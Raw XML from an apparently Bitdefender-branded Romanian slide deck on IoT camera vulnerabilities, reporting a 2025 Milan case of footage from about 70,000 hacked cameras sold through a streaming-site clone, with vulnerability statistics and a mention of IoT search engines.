        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Următorul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Truman Show </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>difuzat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de la tine din living</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9042605F-6740-4904-A5E8-29D172EB53EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="325416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D58AA-DCE3-3A04-E729-E1A125BFB9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221217-CAB1-77C0-4E20-8B52485343DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="408791" y="2067520"/>
            <a:ext cx="11268859" cy="2194127"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>«Welcome to the first channel in Europe dedicated to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" err="1"/>
              <a:t>spycams</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>. A maxi archive dedicated to the world of cameras where you can find unique material: apartments, bathrooms, garages, gym and swimming pool locker rooms, nightclubs, hotel rooms...»</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3696359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8B9707B-A5A6-5C33-A286-3D618B9F93FA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>În</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>iunie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 2025, 5 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>indivizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>condamnați</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Milan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>distribuția</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>conținut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filmat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>spații</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> private</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zeci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de mii de ore de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>captură</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> video de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>înaltă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>rezoluție</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>camere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>supraveghere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> compromise din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apartamente</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, magazine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cabine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>probă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, piscine, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoteluri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Aproximativ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 70,000 de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>camere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> compromise </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Italia</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Atacatorii</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>construit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clonă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de Netflix </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>comercializau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>accesul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pe VKontakte.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Majoritatea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>victimelor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nu pot fi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>identificate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> nu </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>știu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>că</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>apărut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>în</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>filmul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vieții</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> lor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Primul</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>caz</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de voyeurism la o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scară</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>atât</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de mare</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D19A549F-D4EE-108D-CD65-D076F173F600}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vulnerabilități</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> din IoT </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0574C21C-F0AF-5075-4BB8-D2DDF63B57DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10" descr="A qr code with a red circle and a white circle&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C16C254B-7776-1443-4E6D-35886150E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7304" y="2793304"/>
            <a:ext cx="4064696" cy="4064696"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1668403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320B7-440E-F7B2-6611-003CEC2CABC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567BB49-9908-D181-297D-F080396E2E33}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Problema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> e </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sistemică</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>și</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> la o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scară</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>enormă</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> pe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>întreg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globul</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>4.7% din </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>camerele</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IP pe care le </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>monitorizăm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> au </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnerabilități</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>semnificative</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>La </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>scară</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>globală</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>există</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>milioane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de camera IP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vulnerabile</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Motoare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> de </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>căutare</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pentru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> IoT pot </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lista</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>majoritatea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>camerelor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> prost configurate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Discount la SHODAN? Da!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{955E9F42-97FA-E2B1-75AC-2012A00C8845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Vulnerabilități</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> din IoT </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1114CE0D-270D-FDCC-D357-7D80B5D5C6DD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="12" name="Chart 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D84E08E-3754-27C8-C7B8-71DB6F2F5F4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1334878984"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6411558" y="1940756"/>
          <a:ext cx="5407960" cy="46889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4872997"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="Bitdefender Corporate Presentation">
  <a:themeElements>
    <a:clrScheme name="Bitdefender 2023">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="006EFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="006EFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002266"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FF0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00A71A"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="FF7500"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="597080"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="65B0FB"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="597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tions_v2.2" id="{F5D5B5AE-1BEF-4E95-AD7C-0924FBEE53B9}" vid="{8C318EF2-6A42-4450-A757-E4FE70A0A573}"/>
    </a:ext>
  </a:extLst>
</a:theme>
</file>

<file path=ppt/theme/theme2.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" name="BSG">
  <a:themeElements>
    <a:clrScheme name="BitdefenderNewBrand CSG">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="006EFF"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="F2F2F2"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="006DFF"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="002266"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="FF0000"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="00A71A"/>
      </a:accent4>
      <a:accent5>
